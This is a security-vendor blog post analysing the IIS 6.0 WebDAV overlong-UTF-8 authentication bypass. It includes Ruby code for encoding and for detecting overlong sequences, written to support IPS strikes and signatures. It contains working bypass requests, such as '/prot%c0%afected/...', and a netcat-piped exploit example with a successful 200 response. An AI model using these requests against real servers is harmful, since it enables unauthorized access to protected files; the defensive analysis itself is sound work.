Update: The iisunicode.rb script was updated to use the correct character sets for each encoding size. Some typos and the description of the script were also corrected.
On May 12, 2009 Nikolaos Rangos released an advisory detailing an authentication bypass vulnerability in Microsoft IIS 6.0 servers running WebDAV. When WebDAV is enabled, IIS 6.0 fails to properly handle Unicode tokens while parsing URIs. This failure allows an attacker to access documents in a password-protected directory on the server, and in some configurations even to upload documents to the server. Configurations that give the IUSR_[HOSTNAME] Windows user write access to a WebDAV folder can be abused to perform file uploads. If the server is further misconfigured so that ASP scripts can be uploaded to a directory outside the WebDAV folder (for instance, if a non-WebDAV web folder is mapped inside the WebDAV root) and ASP scripts are enabled on that directory, it may be possible to execute ASP code on the server.
The advisory shows that the following request will bypass authentication on the IIS server:
GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
The protected URI in question is /protected/protected.zip, with the string %c0%af inserted in the middle. This is a forward slash that has been converted to UTF-8 using the overlong encoding method with a size of 2 bytes, and the resulting bytes have then been URI-encoded. An example of this using the Rex library from the Metasploit framework is shown here:
Rex::Text.uri_encode(Rex::Text.to_unicode('/','utf-8','overlong',2))
=> "%c0%af"

Thierry Zoller posted a comprehensive blog post on the subject which included a video demonstrating HTTP GET requests downloading files from protected directories, HTTP PROPFIND requests listing protected directories, and HTTP PUT requests uploading ASP code to the IIS server. The video demonstrates the configuration that allows ASP code to execute, as I described above. He also cites work done by the folks behind SkullSecurity, who have posted their analysis as well as some code they created to exploit this vulnerability. Erik Fichtner also discovered this at the same time and contributed a patch to the Metasploit module to support it. Check Point also released a signature to detect attempts at exploiting this vulnerability.
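To make the encoding step concrete, here is an added example that is not code from the Rex library or from the iisunicode.rb script: a stand-alone Ruby encoder that spreads a code point across a chosen number of UTF-8 bytes and percent-encodes the result. The function names (utf8_min_length, utf8_with_length, overlong?, percent_encode, overlong_uri_encoding) are introduced here for illustration only. It shows why %c0%af is a '/' and why the form is illegal: RFC 3629 requires a decoder to reject any sequence longer than the shortest encoding of its code point, which is exactly the check a vulnerable parser skips.

```ruby
# Added example (not from Rex or iisunicode.rb): build the overlong UTF-8 form of
# a code point for a given byte length, then percent-encode it as it would
# appear in a URI path.

# Shortest legal UTF-8 length for a code point.
def utf8_min_length(cp)
  case cp
  when 0..0x7F       then 1
  when 0x80..0x7FF   then 2
  when 0x800..0xFFFF then 3
  else 4
  end
end

# Encode `cp` as UTF-8 using exactly `nbytes` bytes (1..4). When nbytes exceeds
# utf8_min_length(cp) the result is an overlong (illegal) encoding.
def utf8_with_length(cp, nbytes)
  raise ArgumentError, 'nbytes must be 1..4' unless (1..4).cover?(nbytes)
  capacity = [7, 11, 16, 21][nbytes - 1]            # payload bits available per length
  raise ArgumentError, "U+#{cp.to_s(16)} does not fit in #{nbytes} bytes" if cp >= (1 << capacity)
  return [cp].pack('C') if nbytes == 1

  cont_count  = nbytes - 1
  lead_prefix = (0xFF << (8 - nbytes)) & 0xFF       # 0xC0, 0xE0 or 0xF0
  bytes = [lead_prefix | (cp >> (6 * cont_count))]  # top payload bits go in the lead byte
  (cont_count - 1).downto(0) do |i|                 # then 6 bits per continuation byte (10xxxxxx)
    bytes << (0x80 | ((cp >> (6 * i)) & 0x3F))
  end
  bytes.pack('C*')
end

# True when `nbytes` is more than the code point needs.
def overlong?(cp, nbytes)
  nbytes > utf8_min_length(cp)
end

# Percent-encode every byte, which is how the sequence appears in a URI.
def percent_encode(bytes)
  bytes.each_byte.map { |b| format('%%%02x', b) }.join
end

# The URI form of `char` encoded in `nbytes` bytes.
def overlong_uri_encoding(char, nbytes)
  percent_encode(utf8_with_length(char.ord, nbytes))
end

if __FILE__ == $PROGRAM_NAME
  [2, 3, 4].each do |n|
    puts "'/' in #{n} bytes: #{overlong_uri_encoding('/', n)} (overlong: #{overlong?('/'.ord, n)})"
  end
  # A code point that legitimately needs two bytes is not overlong at size 2.
  puts "U+00E9 in 2 bytes: #{percent_encode(utf8_with_length(0xE9, 2))} (overlong: #{overlong?(0xE9, 2)})"
end
```

Running it prints %c0%af for size 2, matching the Rex output above, and %e0%80%af for size 3; U+00E9 at size 2 comes out as the ordinary %c3%a9 because two bytes is its minimal form. The same byte layout is what a decoder must check against: compute the code point, then compare the sequence length with the minimal length.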
I investigated this vulnerability in order to write strikes for this week's StrikePack. I wondered whether %c0%af is the only Unicode sequence that allows the authentication bypass. I set up an IIS server with WebDAV, created a password-protected directory, and put a single file inside the DAV root containing a string I could match on in a script. I then wrote a script that uses the Rex library, manually tested a few characters, and varied the UTF-8 encoding methods and byte sizes used. I started finding that authentication bypass occurred with far more than a simple '/' character. It also appeared that UTF-8 overlong encodings using 2- and 3-byte characters were the only cases in which authentication was bypassed; UTF-8 overlong encodings of 4 bytes or more never bypassed authentication on the WebDAV server. The Unicode-encoded character can appear anywhere inside the protected directory name, meaning anywhere between the first and last forward slash in the directory part of the URI.
At this point, I decided to enumerate all the single-byte characters in the ASCII range using UTF-8 overlong encodings of size 2 and 3 to see which would bypass authentication. The results were interesting. With an encoding size of 2, 118 characters bypassed authentication. With an encoding size of 3, 177 characters bypassed authentication. The differences between the two encoding sizes also showed something else interesting. In size-2 mode, many, but not all, of the alphabetic characters successfully bypassed authentication. However, in size-3 mode, no alphabetic characters were successful. In size-2 mode, no character above ASCII value 0x7f was successful, but in size-3 mode, they all were. I'm unsure of the reason for this, but it will make detection a little more difficult for IPS signature teams.
After this discovery, I wondered if there were any invalid UTF-8 encodings that would work that I hadn't found yet. I wrote a script to enumerate all 65K possibilities from %00%00 to %ff%ff. The results from this method exactly agreed with my findings using the Rex library. I have written a version to brute-force through the size-3 characters, but that set is 16 million long, which has exceeded my local resource limits. Once that is corrected, if there are any new findings, I will update this blog post.
I am making the script that uses the Rex library available. This script will produce an HTTP GET request that you can pipe to your server using netcat or something similar. You'll need to modify the Host: header, as well as the path to your protected directory ('/protected') and filename ('secretfile.txt').
Don't forget that any number of UTF-8 characters can be used, which makes detection somewhat interesting. IDS and IPS signatures for this vulnerability must be able to detect every possible encoded character across multiple UTF-8 encoding lengths in order to block attempts to exploit it; a signature that matches only %c0%af misses the rest.
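The detection requirement above, as an added example that is neither the page's script nor the Check Point signature: a Ruby routine of the kind an IDS/IPS or reverse proxy could apply to the request target. Rather than matching specific byte strings, it percent-decodes the path once, walks the bytes as UTF-8, and reports every sequence that is overlong (more bytes than the shortest legal form of its code point) or malformed (stray continuation byte, truncated sequence, invalid lead byte). That covers the 2- and 3-byte variants described above regardless of which character they decode to, and 4-byte forms as well. The request lines in SAMPLE_REQUEST_LINES are constructed for this example, and all function names are my own.

```ruby
# Added example (not from the page's iisunicode.rb or any vendor signature):
# flag overlong and malformed UTF-8 sequences in a percent-encoded URI path.

# Shortest legal UTF-8 length for a code point.
def utf8_min_length(cp)
  case cp
  when 0..0x7F       then 1
  when 0x80..0x7FF   then 2
  when 0x800..0xFFFF then 3
  else 4
  end
end

# Decode %xx escapes into a binary string. Anything that is not a valid %xx
# escape is left as-is. Only one level of decoding is applied.
def percent_decode(path)
  path.b.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }
end

# Walk the decoded bytes as UTF-8. Returns one finding per suspicious sequence:
# { offset:, bytes:, kind: :overlong | :malformed, code_point: }.
def scan_overlong(decoded)
  bytes = decoded.bytes
  findings = []
  i = 0
  while i < bytes.length
    b = bytes[i]
    if b < 0x80            # plain ASCII, nothing to check
      i += 1
      next
    end
    # Expected sequence length and payload bits from the lead byte.
    len, payload =
      if    (b & 0xE0) == 0xC0 then [2, b & 0x1F]
      elsif (b & 0xF0) == 0xE0 then [3, b & 0x0F]
      elsif (b & 0xF8) == 0xF0 then [4, b & 0x07]
      else  [nil, nil]     # stray continuation byte or 0xF8..0xFF lead byte
      end
    if len.nil?
      findings << { offset: i, bytes: bytes[i, 1], kind: :malformed, code_point: nil }
      i += 1
      next
    end
    seq   = bytes[i, len]
    conts = seq[1..] || []
    if seq.length < len || conts.any? { |c| (c & 0xC0) != 0x80 }
      findings << { offset: i, bytes: seq, kind: :malformed, code_point: nil }
      i += 1               # resynchronise on the next byte
      next
    end
    cp = conts.reduce(payload) { |acc, c| (acc << 6) | (c & 0x3F) }
    if len > utf8_min_length(cp)
      findings << { offset: i, bytes: seq, kind: :overlong, code_point: cp }
    end
    i += len
  end
  findings
end

# Inspect one request line ("GET /path HTTP/1.1") and return log-style strings,
# one per finding in the path component.
def inspect_request_line(line)
  method, target, _version = line.split(' ', 3)
  path = target.to_s.split('?', 2).first.to_s
  scan_overlong(percent_decode(path)).map do |f|
    hex     = f[:bytes].map { |x| format('%02x', x) }.join
    decoded = f[:code_point] ? format('U+%04X', f[:code_point]) : 'n/a'
    "#{method} #{path}: #{f[:kind]} sequence #{hex} at byte #{f[:offset]} (decodes to #{decoded})"
  end
end

# Constructed sample traffic for this example.
SAMPLE_REQUEST_LINES = [
  'GET /prot%c0%afected/protected.zip HTTP/1.1',    # the advisory's 2-byte overlong '/'
  'GET /prot%e0%80%afected/protected.zip HTTP/1.1', # 3-byte overlong '/'
  'GET /pr%c1%8ftected/file.txt HTTP/1.1',          # 2-byte overlong 'O' (U+004F)
  'GET /caf%c3%a9/menu.txt HTTP/1.1',               # legitimate 2-byte U+00E9: no finding
  'GET /protected/protected.zip HTTP/1.1'           # ordinary request: no finding
].freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLE_REQUEST_LINES.each { |l| inspect_request_line(l).each { |msg| puts msg } }
end
```

Three of the five constructed lines produce a finding; the legitimate %c3%a9 does not, because two bytes is the minimal form of U+00E9. The decision is made on sequence length versus minimal length, so the size-2 versus size-3 character-set differences described above do not matter to it. Malformed sequences are reported separately because a lax decoder that accepts overlong forms may accept those too.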
I'll leave you with this example from some of my testing:
$ iisunicode.rb utf-8 overlong 2 1000 | nc iisserver 80
GET /protect%c0%8a%c1%b3%c0%8a%c0%bf%c1%ba%c0%91%c1%93%c0%b9%c0%bb%c0%a4%c1%ab%c0%99%c0%91%c1%8b%c0%86%c1%86%c1%96%c0%ab%c0%a7%c1%88%c0%b9%c1%a8%c1%b1%c1%a6%c0%a9%c1%a9%c1%95%c1%b3%c0%8c%c0%91%c1%be%c1%80%c0%84%c1%a4%c1%86%c0%b9%c0%86%c0%91%c0%94%c0%9e%c0%98%c1%bb%c0%a3%c1%a3%c1%b7%c1%9e%c1%a0%c1%b5%c1%8c%c0%b6%c1%b2%c1%88%c1%8b%c0%89%c0%a1%c1%98%c1%80%c0%85%c0%ac%c0%a8%c1%b6%c1%85%c0%9b%c0%8b%c0%b6%c0%8e%c1%a0%c1%b3%c1%8a%c1%91%c1%b0%c1%a3%c0%94%c0%9e%c1%99%c0%82%c1%a2%c1%89%c1%bd%c1%9e%c1%9a%c0%b0%c0%a4%c1%b5%c0%88%c1%88%c0%ba%c1%b9%c0%80%c1%86%c1%97%c0%aa%c0%9f%c1%bd%c0%82%c0%82%c0%a8%c0%84%c1%aa%c1%97%c1%a7%c0%9a%c1%b0%c1%ab%c1%ac%c1%87%c0%84%c1%9a%c0%8b%c0%ba%c1%b8%c0%88%c0%95%c1%97%c1%9c%c1%a1%c0%ad%c1%a9%c1%8e%c0%8a%c0%b1%c1%9f%c0%a0%c0%8a%c1%aa%c0%84%c1%8a%c0%92%c1%bb%c1%a9%c1%ac%c1%a6%c1%b9%c1%8c%c1%ac%c1%82%c1%98%c0%99%c1%ad%c0%a2%c0%b9%c0%8c%c0%9b%c0%8e%c1%b3%c1%b8%c0%b6%c1%bf%c0%a7%c0%b0%c0%95%c1%a6%c0%8a%c1%b1%c1%9f%c0%a5%c0%a2%c0%b9%c0%a4%c0%a5%c0%8e%c0%98%c0%aa%c0%8b%c1%93%c0%ae%c0%b5%c0%97%c1%ba%c1%bb%c0%91%c1%b3%c0%a1%c1%ad%c1%92%c0%ae%c0%b0%c1%aa%c0%bd%c1%b3%c1%bb%c0%8b%c1%87%c1%89%c0%82%c1%93%c1%b4%c0%a8%c0%84%c1%8e%c0%a5%c0%9c%c0%ac%c0%ae%c1%be%c0%a2%c1%b3%c1%bd%c0%a8%c0%ba%c0%97%c1%ac%c1%ac%c1%ae%c0%ae%c0%b2%c1%93%c1%9c%c0%95%c0%aa%c1%91%c0%83%c0%82%c0%ad%c1%a0%c1%a1%c0%8b%c1%ac%c1%86%c0%80%c1%a2%c1%b0%c1%85%c1%bd%c1%87%c0%af%c0%92%c1%9e%c1%91%c1%86%c0%94%c1%9a%c0%aa%c0%b3%c1%85%c0%8a%c1%92%c0%a7%c1%82%c0%a7%c0%8b%c0%ad%c1%8a%c1%9b%c0%9f%c0%b8%c0%8b%c1%9c%c1%94%c1%b7%c0%bd%c1%a3%c1%a8%c1%b2%c0%83%c0%89%c1%a0%c0%9a%c0%bb%c1%b9%c1%9c%c1%88%c0%af%c0%b4%c1%83%c1%bf%c1%8c%c0%98%c0%9c%c0%be%c0%9f%c1%99%c0%ae%c0%92%c0%94%c1%b0%c1%b3%c0%85%c1%9a%c0%8e%c0%80%c0%b2%c1%aa%c0%95%c1%84%c1%b7%c0%b5%c1%8b%c0%b8%c0%a1%c0%99%c1%96%c0%b7%c1%b0%c0%bb%c1%b6%c0%a4%c1%82%c0%b0%c1%a2%c1%a3%c0%97%c1%b7%c1%9c%c0%bf%c1%93%c0%98%c0%8c%c1%ae%c0%ab%c1%91%c0%a7%c1%91%c0%ae%c0%8b%c1%ba%c0%88%c1%aa%c1%bf%c1%94%c1%8b%c0%a8%c1%be%c0%8c%c0%af%c1%bb%c1%97%c0%bd%c0%bb%c1%8e%c1%bd%c1%bf%c0%8b%c0%9c%c1%a7%c0%9f%c0%a8%c0%af%c1%ae%c1%95%c0%8a%c1%ad%c1%a5%c0%91%c1%bc%c0%a9%c1%87%c0%85%c1%89%c0%94%c1%ad%c0%ae%c1%91%c0%8a%c0%a8%c0%9e%c0%96%c0%a2%c0%bd%c1%92%c1%b3%c1%a0%c0%83%c1%87%c0%95%c1%a3%c0%b3%c1%91%c0%b0%c0%95%c0%a1%c0%93%c1%8e%c0%b4%c0%8e%c1%a8%c1%9c%c0%be%c0%a2%c0%9e%c1%86%c0%87%c1%96%c1%8c%c0%80%c1%bd%c1%b1%c0%a9%c1%8c%c0%88%c1%b7%c1%ab%c1%96%c1%8e%c1%97%c0%8c%c0%82%c0%82%c1%88%c1%a3%c1%aa%c1%bf%c1%92%c1%9a%c0%9b%c1%a2%c1%b9%c1%bf%c0%ab%c1%8a%c0%af%c0%9b%c0%99%c1%98%c0%83%c0%8b%c0%bd%c0%a9%c0%bc%c0%a9%c0%a4%c0%a4%c1%b4%c1%95%c0%ab%c0%b8%c1%ac%c1%bd%c1%9b%c0%a6%c0%b2%c0%8e%c0%91%c1%b1%c1%b1%c0%95%c0%b4%c1%8e%c1%83%c1%a8%c1%a4%c1%9c%c0%83%c0%8b%c0%b1%c0%8c%c1%8c%c0%8b%c1%bc%c0%bf%c0%93%c1%b6%c1%a2%c1%9f%c1%9c%c1%84%c1%8b%c1%84%c0%a2%c0%ba%c1%82%c0%9f%c1%97%c0%bf%c1%96%c1%96%c0%a7%c0%97%c1%8c%c0%9c%c1%9e%c0%91%c0%bc%c0%9e%c0%93%c1%ba%c1%84%c0%92%c0%89%c1%b9%c0%8b%c1%85%c1%b4%c0%99%c0%8c%c1%82%c1%ae%c0%b5%c0%ac%c1%9c%c1%b9%c0%87%c0%91%c1%84%c0%a9%c0%a4%c0%bb%c0%b7%c0%b4%c0%82%c1%9e%c1%8c%c0%9f%c1%8b%c0%9a%c1%a3%c0%a2%c1%88%c0%9b%c0%86%c0%ba%c0%92%c1%98%c1%99%c0%84%c1%b8%c0%a0%c1%95%c1%88%c1%a5%c0%8e%c1%89%c1%87%c1%b6%c1%89%c1%a2%c0%b5%c0%87%c1%a2%c1%8b%c0%83%c1%be%c0%98%c1%a6%c1%a0%c1%9c%c1%a6%c1%bd%c1%b3%c0%a0%c0%a7%c0%9f%c1%9a%c0%87%c0%ba%c0%b3%c0%a7%c1%a6%c0%af%c0%8c%c0%b7%c0%ac%c0%98%c0%95%c1%94%c0%97%c0%86%c1%9a%c0%b9%c0%96%c0%a3%c1%94%c1%93%c1%b2%c1%a9%c1%92%c1%98%c0%b3%c0%94%c1%ac%c0%88%c1%b5%c0%89%c0%a1%c0%a2%c0%a9%c0%9a%c1%be%c0%82%c0%a9%c1%82%c1%94%c0%9e%c0%b2%c0%b6%c1%b9%c1%98%c1%9c%c0%80%c0%94%c1%94%c1%b4%c0%84%c1%92%c1%9c%c1%86%c1%be%c1%b8%c0%99%c0%88%c1%bd%c1%88%c1%8b%c1%b6%c1%b1%c0%ab%c1%85%c1%97%c0%9b%c0%8a%c1%b5%c0%bb%c1%92%c1%97%c0%95%c0%b9%c1%a6%c0%b9%c1%b3%c0%98%c0%89%c0%94%c0%b0%c0%85%c0%aa%c0%ab%c0%8e%c1%8a%c1%80%c0%a4%c0%bf%c1%96%c1%a5%c0%b2%c0%92%c0%b0%c0%b7%c0%9a%c0%8a%c1%b6%c1%a6%c0%ab%c1%af%c1%bd%c1%be%c0%91%c1%b7%c0%b0%c0%b8%c0%83%c1%a3%c0%bc%c0%82%c1%bd%c1%ba%c0%83%c1%b9%c1%98%c0%88%c1%9e%c1%bf%c0%9c%c1%ac%c1%bd%c1%a3%c0%a9%c0%ba%c0%bf%c0%a0%c0%bc%c0%b1%c1%b3%c1%98%c1%91%c0%9b%c1%a4%c0%8b%c0%ab%c0%89%c1%91%c0%b5%c1%a0%c1%9c%c1%9b%c1%bb%c0%b8%c1%ad%c1%96%c0%a8%c1%8c%c1%a2%c1%97%c1%89%c0%89%c0%80%c0%a5%c0%ac%c0%a8%c0%ba%c0%89%c1%ad%c0%97%c1%8c%c1%b3%c1%92%c0%a0%c0%86%c1%a2%c1%be%c0%8b%c0%93%c0%bf%c1%b2%c1%b2%c0%b0%c0%b5%c1%9b%c0%a7%c1%aa%c0%be%c0%af%c1%b0%c0%a6%c0%8b%c1%b8%c1%be%c0%9b%c0%bf%c0%b0%c1%a6%c0%aa%c1%b5%c1%95%c1%95%c1%89%c1%b7%c1%ab%c1%a0%c1%84%c0%b9%c0%b2%c1%a6%c0%a8%c0%8e%c1%9c%c0%a2%c0%84%c1%85%c1%89%c1%8c%c0%a4%c1%86%c0%ba%c0%a1%c0%b6%c0%98%c1%b8%c0%b8%c0%aa%c0%a4%c0%b4%c0%a0%c0%86%c1%95%c0%83%c0%9a%c1%bf%c0%86%c1%b2%c0%bf%c0%85%c1%bc%c1%a7%c1%8e%c1%97%c1%ab%c1%86%c0%a8%c1%92%c1%89%c1%b7%c1%aa%c1%bf%c0%a0%c1%a3%c0%80%c1%8e%c0%ab%c1%ad%c1%a4%c1%82%c1%87%c1%b5%c1%83%c0%92%c0%b9%c1%b3%c1%ab%c0%9c%c0%b8%c1%82%c1%b6%c0%96%c1%bd%c1%99%c1%9e%c0%b8%c1%8c%c0%97%c1%ba%c1%b3%c0%a9%c1%ba%c1%95%c0%ac%c1%b1%c1%a1%c0%ab%c0%84%c1%a5%c0%95%c1%a2%c0%9a%c1%b4%c0%a8%c0%ba%c0%94%c0%83%c1%ab%c1%9a%c0%ac%c0%94%c1%82%c0%a8%c1%b6%c1%b5%c1%a9%c0%92%c1%a8%c1%9c%c1%82%c0%87%c0%93%c0%97%c0%a1%c0%b7%c1%a1%c1%a3%c0%98%c1%a1%c0%a9%c1%b2%c1%a7%c1%96%c1%9e%c0%84%c0%84%c1%93%c0%a7%c0%84%c0%85%c0%94%c1%bb%c1%b9%c1%a5%c1%87%c0%a1%c0%8e%c0%a6%c0%98%c0%b0%c0%89%c0%8e%c1%86%c0%96%c0%87%c1%a6%c1%b7%c0%bf%c0%b1%c0%8b%c0%99%c1%a6%c0%87%c1%85%c0%ba%c1%85%c1%b1%c0%aa%c0%b5%c1%b9%c1%a3%c1%b7%c0%98%c1%96%c0%a2%c0%86%c1%ae%c0%85%c0%ab%c0%8c%c1%a5%c1%b2%c1%91%c0%8e%c1%ac%c0%89%c0%aa%c0%b7%c1%a1%c0%8b%c1%a7%c1%9b%c0%b6%c0%b5%c0%91%c1%91%c0%bd%c0%b0%c1%a4%c0%80%c0%85%c0%b4%c1%9a%c0%9f%c0%a0%c1%87%c1%b5%c0%a1%c1%bc%c0%b9%c1%91%c1%a2%c1%87%c0%a3%c1%b4%c0%9e%c0%8b%c0%b6%c0%a7%c0%b5%c1%bc%c1%82%c0%ba%c1%96%c0%8b%c0%bb%c0%b6%c1%a5%c0%8b%c0%85%c1%b5%c1%b5%c0%b4%c0%9f%c1%9c%c1%87%c1%87%c0%b7%c1%b7%c0%95%c0%96%c0%9b%c1%91%c1%93%c0%a0%c1%b4%c1%b1%c1%b2%c0%86%c0%a2%c0%82%c0%bd%c1%91%c0%99%c1%ae%c0%a9%c0%bc%c0%8a%c0%92%c0%bb%c1%80%c1%8a%c0%a2%c0%aa%c0%94%c0%bc%c0%a7%c0%b8%c0%a8%c0%9e%c0%a1%c0%ad%c0%8a%c0%93%c0%9c%c0%8a%c1%89%c1%b1%c1%83%c1%b4ed/secretfile.txt HTTP/1.1
Translate: f
Connection: close
Host: iisserver

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 May 2009 21:10:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/plain
Content-Length: 5
ETag: "5e5fb737f8dac91:a6d"
Last-Modified: Fri, 22 May 2009 16:13:17 GMT
Accept-Ranges: bytes
PWNT!
Customers can download StrikePacks 46157/46159 to get access to new strikes that test this vulnerability. StrikeCenter authentication is required.